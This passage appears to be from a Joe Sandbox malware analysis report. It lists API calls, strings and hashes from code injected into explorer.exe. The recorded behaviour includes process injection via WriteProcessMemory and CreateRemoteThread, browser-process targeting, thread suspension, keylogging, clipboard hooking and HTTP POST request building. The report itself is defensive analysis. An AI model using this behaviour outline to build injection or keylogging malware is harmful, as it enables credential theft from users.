Instruction Fuzzy Hash: 89219735E0030BB7DF115EADAD885BF7AAB9B45245B4440B5E909E3251DB36C9218B50

Function 02791752 Relevance: 15.8, APIs: 6, Strings: 3, Instructions: 44
libraryloaderCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetModuleHandleA.KERNEL32(ntdll.dll,sscanf,?,?,?,02791539,?,?,?,0279144B,?), ref: 02791763
GetProcAddress.KERNEL32(00000000), ref: 0279176A
RtlZeroMemory.NTDLL(02794228,00000104), ref: 02791788
RtlZeroMemory.NTDLL(02794118,00000104), ref: 02791790
RtlZeroMemory.NTDLL(02794330,00000104), ref: 02791798
RtlZeroMemory.NTDLL(02794000,00000104), ref: 027917A1

Strings

ntdll.dll, xrefs: 0279175A
%s%s%s%s, xrefs: 027917B3
sscanf, xrefs: 02791755

Memory Dump Source

Source File: 00000016.00000002.2893384423.0000000002791000.00000040.80000000.00040000.00000000.sdmp, Offset: 02791000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_2791000_explorer.jbxd

Yara matches

Similarity

API ID: MemoryZero$AddressHandleModuleProc
String ID: %s%s%s%s$ntdll.dll$sscanf
API String ID: 1490332519-278825019
Opcode ID: d176d02dfcbeb3419792eb86f668d4ffe558b58db737d6328e696590657a9a62
Instruction ID: 488dfa21ca959bac726ca4f99f0cbbe3da0d083d85f5798ad990461f5197e0d3
Opcode Fuzzy Hash: d176d02dfcbeb3419792eb86f668d4ffe558b58db737d6328e696590657a9a62
Instruction Fuzzy Hash: 46F0AEF2FC032C33BD1022AE7C1AC4BBF5CC555DEA3430191B5067320199A6681245F4

Function 027924D5 Relevance: 15.1, APIs: 10, Instructions: 51
threadprocessinjectionCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetCurrentProcessId.KERNEL32 ref: 027924E7
GetCurrentThreadId.KERNEL32 ref: 027924EF
CreateToolhelp32Snapshot.KERNEL32(00000004,00000000), ref: 027924FF
Thread32First.KERNEL32(00000000,0000001C), ref: 0279250D
OpenThread.KERNEL32(001FFFFF,00000000,?), ref: 0279252C
SuspendThread.KERNEL32(00000000), ref: 0279253C
CloseHandle.KERNEL32(00000000), ref: 0279254B
Thread32Next.KERNEL32(00000000,0000001C), ref: 0279255B
CloseHandle.KERNEL32(00000000), ref: 02792566

Memory Dump Source

Source File: 00000016.00000002.2893384423.0000000002791000.00000040.80000000.00040000.00000000.sdmp, Offset: 02791000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_2791000_explorer.jbxd

Yara matches

Similarity

API ID: Thread$CloseCurrentHandleThread32$CreateFirstNextOpenProcessSnapshotSuspendToolhelp32
String ID:
API String ID: 1467098526-0
Opcode ID: 74bcaf571410dc1bde0d3ae5d2c1ee98b1b7cc269f3f8db81674f3b7be262079
Instruction ID: 09548f11a37a1f43ad162a10fbf5920a3f6f68fe94a3af15c920dd7ff6ef0af7
Opcode Fuzzy Hash: 74bcaf571410dc1bde0d3ae5d2c1ee98b1b7cc269f3f8db81674f3b7be262079
Instruction Fuzzy Hash: D51182B1C44310EFDB00AF64A85CB7FBBA5FF45701F008999F94292141D731892A8BA2

Function 02791F4A Relevance: 14.3, APIs: 4, Strings: 4, Instructions: 283
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 02792861: GetProcessHeap.KERNEL32(00000008,0000A000,027910CC), ref: 02792864
Part of subcall function 02792861: RtlAllocateHeap.NTDLL(00000000), ref: 0279286B

Part of subcall function 027927E2: lstrlen.KERNEL32(027940DA,?,00000000,00000000,02791F86,74DE8A60,027940DA,00000000), ref: 027927EA
Part of subcall function 027927E2: MultiByteToWideChar.KERNEL32(00000000,00000000,027940DA,00000001,00000000,00000000), ref: 027927FC

Part of subcall function 02792374: RtlZeroMemory.NTDLL(?,00000018), ref: 02792386

RtlZeroMemory.NTDLL(?,0000003C), ref: 02791FE2
wsprintfW.USER32 ref: 0279211B
wsprintfW.USER32 ref: 02792186
RtlMoveMemory.NTDLL(00000000,00000000,?), ref: 02792250

Strings

Accept: */*Referer: %S, xrefs: 02792111
Host: %s, xrefs: 02792180
POST, xrefs: 027920CC
Content-Type: application/x-www-form-urlencoded, xrefs: 027921AA

Memory Dump Source

Source File: 00000016.00000002.2893384423.0000000002791000.00000040.80000000.00040000.00000000.sdmp, Offset: 02791000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_2791000_explorer.jbxd

Yara matches

Similarity

API ID: Memory$HeapZerowsprintf$AllocateByteCharMoveMultiProcessWidelstrlen
String ID: Accept: */*Referer: %S$Content-Type: application/x-www-form-urlencoded$Host: %s$POST
API String ID: 4204651544-1701262698
Opcode ID: 882c75d8f1e7804324d863d590c345fdfe5d5be8a53308ccae1a22d2186dc7e8
Instruction ID: f0fb9afdfa0756a606dfb48a262ac8a96934aad3beaf860511f048386eadf380
Opcode Fuzzy Hash: 882c75d8f1e7804324d863d590c345fdfe5d5be8a53308ccae1a22d2186dc7e8
Instruction Fuzzy Hash: 99A17C71A08305AFDB11EF68E885A2BBBE9FB88344F10492DF985D3252DB70D915CF52

Function 027925AD Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 39
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

OpenProcess.KERNEL32(00000400,00000000,?,74DEE800,?,?,microsoftedgecp.exe,02791287), ref: 027925BF
IsWow64Process.KERNEL32(000000FF,?), ref: 027925D1
IsWow64Process.KERNEL32(00000000,?), ref: 027925E4
CloseHandle.KERNEL32(00000000), ref: 027925FA

Strings

microsoftedgecp.exe, xrefs: 027925AD

Memory Dump Source

Source File: 00000016.00000002.2893384423.0000000002791000.00000040.80000000.00040000.00000000.sdmp, Offset: 02791000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_2791000_explorer.jbxd

Yara matches

Similarity

API ID: Process$Wow64$CloseHandleOpen
String ID: microsoftedgecp.exe
API String ID: 331459951-1475183003
Opcode ID: d29f6b0ec9dd3731fa851f2e67c8ba2d2a9d0d4271604d7596235b7fa6bea234
Instruction ID: aedbd757c0f3f558c631c6c36acb0aa822e885a654a93624b1eea9cfbea9e099
Opcode Fuzzy Hash: d29f6b0ec9dd3731fa851f2e67c8ba2d2a9d0d4271604d7596235b7fa6bea234
Instruction Fuzzy Hash: BBF09071D82328FF9B10DF95AD999EE776CEB01255B1442AAFD0492240D7314E15E6A0

Function 02791B17 Relevance: 6.1, APIs: 4, Instructions: 101
libraryloaderCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

RtlMoveMemory.NTDLL(?,?,?), ref: 02791B4E
LoadLibraryA.KERNEL32(?,02794434,00000000,00000000,74DF2EE0,00000000,02791910,?,?,?,00000001,?,00000000), ref: 02791B76
GetProcAddress.KERNEL32(00000000,-00000002), ref: 02791BA3
LdrProcessRelocationBlock.NTDLL(?,?,00000008,?), ref: 02791BF4

Memory Dump Source

Source File: 00000016.00000002.2893384423.0000000002791000.00000040.80000000.00040000.00000000.sdmp, Offset: 02791000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_2791000_explorer.jbxd

Yara matches

Similarity

API ID: AddressBlockLibraryLoadMemoryMoveProcProcessRelocation
String ID:
API String ID: 3827878703-0
Opcode ID: c944f0535cd273954312614b0f7d895358bc93a23e8c59d0421a8c7373f9103b
Instruction ID: 9d9cd06fa01eef69e37cfd190e659f3d7c2b16a400ab801bbf18d345b3fb5000
Opcode Fuzzy Hash: c944f0535cd273954312614b0f7d895358bc93a23e8c59d0421a8c7373f9103b
Instruction Fuzzy Hash: 0131A175701302ABCF24CF2DD884B76B7E9EF05319B84456DE88AC7600E731E866CBA0

Analysis Process: explorer.exePID: 7728, Parent PID: 2580COMMON

Execution Graph

Execution Coverage:	8.8%
Dynamic/Decrypted Code Coverage:	0%
Signature Coverage:	0%
Total number of Nodes:	9
Total number of Limit Nodes:	2

Callgraph

Executed
Not Executed
Opacity -> Relevance
Disassembly available

Executed Functions

Function 005D355C Relevance: 1.6, APIs: 1, Instructions: 73
nativeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

NtUnmapViewOfSection.NTDLL ref: 005D35D8

Memory Dump Source

Source File: 0000001A.00000002.2892796077.00000000005D1000.00000040.80000000.00040000.00000000.sdmp, Offset: 005D1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_26_2_5d1000_explorer.jbxd

Yara matches

Similarity

API ID: SectionUnmapView
String ID:
API String ID: 498011366-0
Opcode ID: 105ce7ebc966886b9a25723169f2257f301d4275c672492e635fc8e478682f43
Instruction ID: f58a9656c0157aa5fe8d599ab967257ba381eb3d61cd2b4ba829cda0502b64ab
Opcode Fuzzy Hash: 105ce7ebc966886b9a25723169f2257f301d4275c672492e635fc8e478682f43
Instruction Fuzzy Hash: C9118230715E095BEB68FBBCA89D2793BA0FB54302F54012BA419C67A1DA398A40C702

Function 005D3220 Relevance: 7.7, APIs: 5, Instructions: 241
processCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateToolhelp32Snapshot.KERNEL32 ref: 005D3266
Process32First.KERNEL32 ref: 005D3289
Process32Next.KERNEL32 ref: 005D3532
CloseHandle.KERNELBASE ref: 005D3543
SleepEx.KERNELBASE ref: 005D354E

Memory Dump Source

Source File: 0000001A.00000002.2892796077.00000000005D1000.00000040.80000000.00040000.00000000.sdmp, Offset: 005D1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_26_2_5d1000_explorer.jbxd

Yara matches

Similarity

API ID: Process32$CloseCreateFirstHandleNextSleepSnapshotToolhelp32
String ID:
API String ID: 2482764027-0
Opcode ID: dd7379c30c01fbe83c455f487028ed93214d04d4b8b4672215a43173641bdad8
Instruction ID: e8027f5558bea5a55daf24c1dca6770b606d2267751689c34a5abc2339cc0490
Opcode Fuzzy Hash: dd7379c30c01fbe83c455f487028ed93214d04d4b8b4672215a43173641bdad8
Instruction Fuzzy Hash: 028125312186098FEB16DF58ED58BEABBA1FB91741F54461BD443C7160EF78DA04CB82

Function 005DA048 Relevance: 4.7, APIs: 3, Instructions: 223
memorylibraryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LoadLibraryA.KERNELBASE ref: 005DA147
VirtualProtect.KERNELBASE(?,?,?,?,?,?,?,-0000000E), ref: 005DA1BB
VirtualProtect.KERNELBASE ref: 005DA1D9

Memory Dump Source

Source File: 0000001A.00000002.2892796077.00000000005D7000.00000040.80000000.00040000.00000000.sdmp, Offset: 005D7000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_26_2_5d7000_explorer.jbxd

Similarity

API ID: ProtectVirtual$LibraryLoad
String ID:
API String ID: 895956442-0
Opcode ID: 9471cbd89cfacdc20873a06991d91791c754b160c08a2600c3720216ed5fc549
Instruction ID: 89f78b0eacbfa52555f3255c5befe1efebd0d1a7a564f3397b5f3b41862121d1
Opcode Fuzzy Hash: 9471cbd89cfacdc20873a06991d91791c754b160c08a2600c3720216ed5fc549
Instruction Fuzzy Hash: 7C517B3235891D4BCB34AA7C9CC86B6BBC1F755325F580B2BD48AC3385E659D886C383

Analysis Process: explorer.exePID: 7568, Parent PID: 2580COMMON

Execution Graph

Execution Coverage:	15.1%
Dynamic/Decrypted Code Coverage:	97.6%
Signature Coverage:	18.6%
Total number of Nodes:	328
Total number of Limit Nodes:	7

Callgraph

Executed
Not Executed
Opacity -> Relevance
Disassembly available

Executed Functions

Function 02791016 Relevance: 33.4, APIs: 14, Strings: 5, Instructions: 193
stringsleepprocessCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 02792724: VirtualQuery.KERNEL32(00000000,?,0000001C,?,?,?,00000000,027929F3,-00000001,0279128C), ref: 02792731

Part of subcall function 02792A09: GetProcessHeap.KERNEL32(00000008,0000A000,027910BF), ref: 02792A0C
Part of subcall function 02792A09: RtlAllocateHeap.NTDLL(00000000), ref: 02792A13

RtlMoveMemory.NTDLL(00000000,?,00000363), ref: 02791038
RtlMoveMemory.NTDLL(00000000,?,?), ref: 0279106C
NtUnmapViewOfSection.NTDLL(000000FF,?), ref: 02791075
GetCurrentProcessId.KERNEL32(?,02791010), ref: 0279107B
wsprintfA.USER32 ref: 027910E7
RtlMoveMemory.NTDLL(00000000,0000000C,-00000001), ref: 02791155
CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 02791160
Process32First.KERNEL32(00000000,?), ref: 0279117F
CharLowerA.USER32(?), ref: 02791199
lstrcmpiA.KERNEL32(?,explorer.exe), ref: 027911B5
lstrcmpiA.KERNEL32(?,microsoftedgecp.exe), ref: 02791212
Process32Next.KERNEL32(00000000,00000128), ref: 0279126C
CloseHandle.KERNELBASE(00000000), ref: 0279127F
Sleep.KERNELBASE(000003E8), ref: 0279129F

Strings

explorer.exe, xrefs: 027911AB
%s%s, xrefs: 027910E1
keylog_rules=, xrefs: 0279110D
|:|, xrefs: 02791125
microsoftedgecp.exe, xrefs: 02791208

Memory Dump Source

Source File: 0000001B.00000002.2893317519.0000000002791000.00000040.80000000.00040000.00000000.sdmp, Offset: 02791000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_27_2_2791000_explorer.jbxd

Similarity

API ID: MemoryMove$HeapProcessProcess32lstrcmpi$AllocateCharCloseCreateCurrentFirstHandleLowerNextQuerySectionSleepSnapshotToolhelp32UnmapViewVirtualwsprintf
String ID: %s%s$explorer.exe$keylog_rules=$microsoftedgecp.exe$|:|
API String ID: 3206029838-2805246637
Opcode ID: a2089eaaf61b955d9e4909b5383049f9b8fa406adae4e2ee3a3a20a3594b589c
Instruction ID: 98b8a7bc2793fc750c27cbc042dd1ccf6cd7e8d422abfc5a5d9875acfe815ef8
Opcode Fuzzy Hash: a2089eaaf61b955d9e4909b5383049f9b8fa406adae4e2ee3a3a20a3594b589c
Instruction Fuzzy Hash: C7514D30A443026FDF15FF78F84CA3B37AAEB45744F804928ED1A97291EB3199168F61

Function 027910A5 Relevance: 26.4, APIs: 10, Strings: 5, Instructions: 151
stringsleepprocessCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 02792A09: GetProcessHeap.KERNEL32(00000008,0000A000,027910BF), ref: 02792A0C
Part of subcall function 02792A09: RtlAllocateHeap.NTDLL(00000000), ref: 02792A13

wsprintfA.USER32 ref: 027910E7

Part of subcall function 0279276D: OpenFileMappingA.KERNEL32(00000006,00000000,00000000), ref: 02792777
Part of subcall function 0279276D: MapViewOfFile.KERNELBASE(00000000,00000006,00000000,00000000,00000000,?,?,027910FE), ref: 02792789

RtlMoveMemory.NTDLL(00000000,0000000C,-00000001), ref: 02791155
CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 02791160
Process32First.KERNEL32(00000000,?), ref: 0279117F
CharLowerA.USER32(?), ref: 02791199
lstrcmpiA.KERNEL32(?,explorer.exe), ref: 027911B5
lstrcmpiA.KERNEL32(?,microsoftedgecp.exe), ref: 02791212
Process32Next.KERNEL32(00000000,00000128), ref: 0279126C
CloseHandle.KERNELBASE(00000000), ref: 0279127F
Sleep.KERNELBASE(000003E8), ref: 0279129F

Strings

explorer.exe, xrefs: 027911AB
%s%s, xrefs: 027910E1
keylog_rules=, xrefs: 0279110D
|:|, xrefs: 02791125
microsoftedgecp.exe, xrefs: 02791208

Memory Dump Source

Source File: 0000001B.00000002.2893317519.0000000002791000.00000040.80000000.00040000.00000000.sdmp, Offset: 02791000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_27_2_2791000_explorer.jbxd

Similarity

API ID: FileHeapProcess32lstrcmpi$AllocateCharCloseCreateFirstHandleLowerMappingMemoryMoveNextOpenProcessSleepSnapshotToolhelp32Viewwsprintf
String ID: %s%s$explorer.exe$keylog_rules=$microsoftedgecp.exe$|:|
API String ID: 3018447944-2805246637
Opcode ID: a2ae4d14305c6b3828b44ceee19b656f45681dde3a7af6d37893d85954a71d1c
Instruction ID: 9704ada9698f62ed8fe11299d1cda2175e3e5fbd9159c9199761e33925501ad3
Opcode Fuzzy Hash: a2ae4d14305c6b3828b44ceee19b656f45681dde3a7af6d37893d85954a71d1c
Instruction Fuzzy Hash: DD410B30B443016FDF15FF74A888D3F77ABEB85744F804A28ED5A97291EB3099168E61

Function 02799AE0 Relevance: 6.2, APIs: 4, Instructions: 194
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 0000001B.00000002.2893317519.0000000002798000.00000040.80000000.00040000.00000000.sdmp, Offset: 02798000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_27_2_2798000_explorer.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a16c5de751307a603ae859d14b1ce8283effed405b237575b599a8b1dfd681ba
Instruction ID: 16342d75137f514ddb1eb3210b77ac0bc61c1df98adc151d65ecb3d6015ba27b
Opcode Fuzzy Hash: a16c5de751307a603ae859d14b1ce8283effed405b237575b599a8b1dfd681ba
Instruction Fuzzy Hash: FB51F7B1A55752DAFF218A78EC807B4B7A4EB42234B18073DC6E6C73C6E7985846C760

Function 0279276D Relevance: 3.0, APIs: 2, Instructions: 23
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

OpenFileMappingA.KERNEL32(00000006,00000000,00000000), ref: 02792777
MapViewOfFile.KERNELBASE(00000000,00000006,00000000,00000000,00000000,?,?,027910FE), ref: 02792789

Memory Dump Source

Source File: 0000001B.00000002.2893317519.0000000002791000.00000040.80000000.00040000.00000000.sdmp, Offset: 02791000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_27_2_2791000_explorer.jbxd

Similarity

API ID: File$MappingOpenView
String ID:
API String ID: 3439327939-0
Opcode ID: 1b2d9b44950309e1744b6158a7de88138b546fe2b74e380630400635ebabb1e4
Instruction ID: 32e35faddd411c2639c781996b8b790561fd464d15123e1813967184cc191365
Opcode Fuzzy Hash: 1b2d9b44950309e1744b6158a7de88138b546fe2b74e380630400635ebabb1e4
Instruction Fuzzy Hash: 22D01732B41332BBE7345A7B6C0DF83AE9EDF86AE1B014025B90DD2140D6608821C2F0

Function 02792A09 Relevance: 3.0, APIs: 2, Instructions: 6
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetProcessHeap.KERNEL32(00000008,0000A000,027910BF), ref: 02792A0C
RtlAllocateHeap.NTDLL(00000000), ref: 02792A13

Memory Dump Source

Source File: 0000001B.00000002.2893317519.0000000002791000.00000040.80000000.00040000.00000000.sdmp, Offset: 02791000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_27_2_2791000_explorer.jbxd

Similarity

API ID: Heap$AllocateProcess
String ID:
API String ID: 1357844191-0
Opcode ID: bce5dc6224839a1bce330235b5929ba23950a799d81f2e3660b066f59723f804
Instruction ID: 41831169f6367bf9ca5b82d060843478cf5f9a78590e25502944b3414502ef5e
Opcode Fuzzy Hash: bce5dc6224839a1bce330235b5929ba23950a799d81f2e3660b066f59723f804
Instruction Fuzzy Hash: 2EA002B1E903046BDE5457A8A90EF167659A744701F00C9847256C50409D7554558721

Function 027929BD Relevance: 1.3, APIs: 1, Instructions: 6
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

VirtualAlloc.KERNELBASE(00000000,00040744,00003000,00000040,027912D9,00000000,00000000,?,00000001), ref: 027929C7

Memory Dump Source

Source File: 0000001B.00000002.2893317519.0000000002791000.00000040.80000000.00040000.00000000.sdmp, Offset: 02791000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_27_2_2791000_explorer.jbxd

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: b9b17012cf5edb54b0055a83aa46beef0ee7b2b62bd7cb0f1f6667c850cbd8e5
Instruction ID: 6d8d5125dda783bb939e0685f8e9cc2ea5b86f7397ac94d0162b79e18fa6a2de
Opcode Fuzzy Hash: b9b17012cf5edb54b0055a83aa46beef0ee7b2b62bd7cb0f1f6667c850cbd8e5
Instruction Fuzzy Hash: 6CA002B4FD5300BAFD6997569D1FF152A199740F02F108585B30A7C1C056F4B511853D

Function 027929AE Relevance: 1.3, APIs: 1, Instructions: 5
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

VirtualFree.KERNELBASE(00000000,00000000,00008000,027913A4), ref: 027929B6

Memory Dump Source

Source File: 0000001B.00000002.2893317519.0000000002791000.00000040.80000000.00040000.00000000.sdmp, Offset: 02791000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_27_2_2791000_explorer.jbxd

Similarity

API ID: FreeVirtual
String ID:
API String ID: 1263568516-0
Opcode ID: bfaa2aa45f872a01bedf9f312c0ee8d648e4d1b4d377e7ee50a57ea24b08d396
Instruction ID: 6a108189672d07996fc6c4c5f547d2cbe2638716e31104462601e5350a73c224
Opcode Fuzzy Hash: bfaa2aa45f872a01bedf9f312c0ee8d648e4d1b4d377e7ee50a57ea24b08d396
Instruction Fuzzy Hash: 51A00270FD070076ED7457245D0BF0566556740B02F2089847255A80C049B5E4598B18

Non-executed Functions

Function 027918BF Relevance: 45.7, APIs: 23, Strings: 3, Instructions: 208
injectionnativesleepCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 02792724: VirtualQuery.KERNEL32(00000000,?,0000001C,?,?,?,00000000,027929F3,-00000001,0279128C), ref: 02792731

OpenProcess.KERNEL32(001FFFFF,00000000,?,00000000,?,00000000,00000001), ref: 027918F4
NtSetInformationProcess.NTDLL(00000000,00000034,?), ref: 0279192F
NtUnmapViewOfSection.NTDLL(000000FF,00000000), ref: 027919BF
RtlMoveMemory.NTDLL(00000000,02793638,00000016), ref: 027919E6
RtlMoveMemory.NTDLL(-00000016,00000363), ref: 02791A0E
NtUnmapViewOfSection.NTDLL(000000FF,-00000016), ref: 02791A1E
CreateMutexA.KERNEL32(00000000,00000000,opera_shared_counter,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 02791A38
GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00000001,?,00000000), ref: 02791A40
CloseHandle.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,00000001,?), ref: 02791A4E
Sleep.KERNEL32(000003E8,?,?,?,?,?,?,?,?,?,?,?,?,?,00000001,?), ref: 02791A55
GetModuleHandleA.KERNEL32(ntdll,atan,?,?,?,?,?,?,?,?,?,?,?,?,?,00000001), ref: 02791A6B
GetProcAddress.KERNEL32(00000000), ref: 02791A72
ReadProcessMemory.KERNEL32(00000000,00000000,?,00000005,00000363), ref: 02791A88
WriteProcessMemory.KERNEL32(00000000,00000000,?,00000005,00000363), ref: 02791AB2
CreateRemoteThread.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 02791AC5
CloseHandle.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,00000001,?), ref: 02791ACC
Sleep.KERNEL32(000001F4,?,?,?,?,?,?,?,?,?,?,?,?,?,00000001,?), ref: 02791AD3
WriteProcessMemory.KERNEL32(00000000,00000000,?,00000005,00000363), ref: 02791AE7
CreateRemoteThread.KERNEL32(00000000,00000000,00000000,?,00000000,00000000,00000000), ref: 02791AFE
CloseHandle.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,00000001,?), ref: 02791B0B
CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000001,?), ref: 02791B11
CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000001,?), ref: 02791B17
CloseHandle.KERNEL32(00000000,?,00000000), ref: 02791B1A

Strings

atan, xrefs: 02791A61
opera_shared_counter, xrefs: 02791A31
ntdll, xrefs: 02791A66

Memory Dump Source

Source File: 0000001B.00000002.2893317519.0000000002791000.00000040.80000000.00040000.00000000.sdmp, Offset: 02791000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_27_2_2791000_explorer.jbxd

Similarity

API ID: Handle$Close$MemoryProcess$Create$MoveRemoteSectionSleepThreadUnmapViewWrite$AddressErrorInformationLastModuleMutexOpenProcQueryReadVirtual
String ID: atan$ntdll$opera_shared_counter
API String ID: 1066286714-2737717697
Opcode ID: 7f67a9658be4e37c83d5b42ea188674b0f29b38861c2148af5338aeebf5e11df
Instruction ID: 6fac3e75e00bdcb238fa11f3763062cae31ed3f2abb4aa9b5595a0a13046b00e
Opcode Fuzzy Hash: 7f67a9658be4e37c83d5b42ea188674b0f29b38861c2148af5338aeebf5e11df
Instruction Fuzzy Hash: CA61AF71A44305AFDB10DF29EC88E6B7BEEEB48754F404959F949D3240D770D815CB62

Function 02792799 Relevance: 15.8, APIs: 8, Strings: 1, Instructions: 68
encryptionstringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CryptAcquireContextA.ADVAPI32(?,00000000,00000000,00000001,F0000000), ref: 027927B5
CryptCreateHash.ADVAPI32(?,00008003,00000000,00000000,?), ref: 027927CD
lstrlen.KERNEL32(?,00000000), ref: 027927D5
CryptHashData.ADVAPI32(?,?,00000000,?,00000000), ref: 027927E0
CryptGetHashParam.ADVAPI32(?,00000002,?,?,00000000,?,00000000,?,00000000), ref: 027927FA
wsprintfA.USER32 ref: 02792811
CryptDestroyHash.ADVAPI32(?), ref: 0279282A
CryptReleaseContext.ADVAPI32(?,00000000), ref: 02792834

Strings

%02X, xrefs: 0279280B

Memory Dump Source

Source File: 0000001B.00000002.2893317519.0000000002791000.00000040.80000000.00040000.00000000.sdmp, Offset: 02791000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_27_2_2791000_explorer.jbxd

Similarity

API ID: Crypt$Hash$Context$AcquireCreateDataDestroyParamReleaselstrlenwsprintf
String ID: %02X
API String ID: 3341110664-436463671
Opcode ID: 2d134f160536a142c490080cecd4a6f7e33142ade4019128278f416f7baa20e3
Instruction ID: 1c4201458772d9e68e2a04fc23c42426ac5cf79b0c7674c4cf405e8b4eea21d2
Opcode Fuzzy Hash: 2d134f160536a142c490080cecd4a6f7e33142ade4019128278f416f7baa20e3
Instruction Fuzzy Hash: CA116D71D40208BFEB119B99EC89EEEBFBDEB48305F1084A5FA05E2110D7314E22DB60

Function 0279162B Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 50COMMON

Download Yara Rule

APIs

GetKeyboardState.USER32(?), ref: 02791652
ToUnicode.USER32(0000001B,?,?,?,00000009,00000000), ref: 0279167A

Strings

, xrefs: 02791699

Memory Dump Source

Source File: 0000001B.00000002.2893317519.0000000002791000.00000040.80000000.00040000.00000000.sdmp, Offset: 02791000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_27_2_2791000_explorer.jbxd

Similarity

API ID: KeyboardStateUnicode
String ID:
API String ID: 3453085656-3916222277
Opcode ID: 6bd5787b7224e9114a3a6405a39d8d2d4a022a7eb66eb1c9d3ed029253217984
Instruction ID: ebed3622cd00f49de2b542d6a14c7cbf28048d05c1a6180364f6becb9699e3a3
Opcode Fuzzy Hash: 6bd5787b7224e9114a3a6405a39d8d2d4a022a7eb66eb1c9d3ed029253217984
Instruction Fuzzy Hash: 29019232D4071A9BDF34CE54E945BFB73BCAF45B04F88845AE909E2140DF30E565CAA1

Function 027913AE Relevance: 38.6, APIs: 17, Strings: 5, Instructions: 144
libraryloaderthreadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

RtlZeroMemory.NTDLL(02795013,0000001C), ref: 027913C8
VirtualQuery.KERNEL32(027913AE,?,0000001C), ref: 027913DA
GetModuleFileNameA.KERNEL32(00000000,00000000,00000104), ref: 0279140B
GetCurrentProcessId.KERNEL32(00000004), ref: 0279141C
wsprintfA.USER32 ref: 02791433
CreateMutexA.KERNEL32(00000000,00000000,00000000), ref: 02791448
GetLastError.KERNEL32 ref: 0279144E
RtlInitializeCriticalSection.NTDLL(0279582C), ref: 02791465
Sleep.KERNEL32(000001F4), ref: 02791489
GetModuleHandleA.KERNEL32(user32.dll,TranslateMessage), ref: 027914A6
GetProcAddress.KERNEL32(00000000), ref: 027914AF
GetModuleHandleA.KERNEL32(user32.dll,GetClipboardData), ref: 027914D0
GetProcAddress.KERNEL32(00000000), ref: 027914D3
GetModuleHandleA.KERNEL32(kernel32.dll), ref: 027914F1
CreateThread.KERNEL32(00000000,00000000,Function_0000082D,00000000,00000000,00000000), ref: 0279150D
CloseHandle.KERNEL32(00000000), ref: 02791514
RtlExitUserThread.NTDLL(00000000), ref: 0279152A

Strings

user32.dll, xrefs: 027914A1, 027914CB
%s%d%d%d, xrefs: 0279142D
GetClipboardData, xrefs: 027914C6
TranslateMessage, xrefs: 0279149C
kernel32.dll, xrefs: 027914EC

Memory Dump Source

Source File: 0000001B.00000002.2893317519.0000000002791000.00000040.80000000.00040000.00000000.sdmp, Offset: 02791000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_27_2_2791000_explorer.jbxd

Similarity

API ID: HandleModule$AddressCreateProcThread$CloseCriticalCurrentErrorExitFileInitializeLastMemoryMutexNameProcessQuerySectionSleepUserVirtualZerowsprintf
String ID: %s%d%d%d$GetClipboardData$TranslateMessage$kernel32.dll$user32.dll
API String ID: 3628807430-1779906909
Opcode ID: ce19153dfc0de67f722fde1044a41740961121862a62f74b0f8b675de824ae8f
Instruction ID: eface2d49c5b20603d27a2016dd4ce3bdb253fa99e12ecd0e2028bae7c3ea505
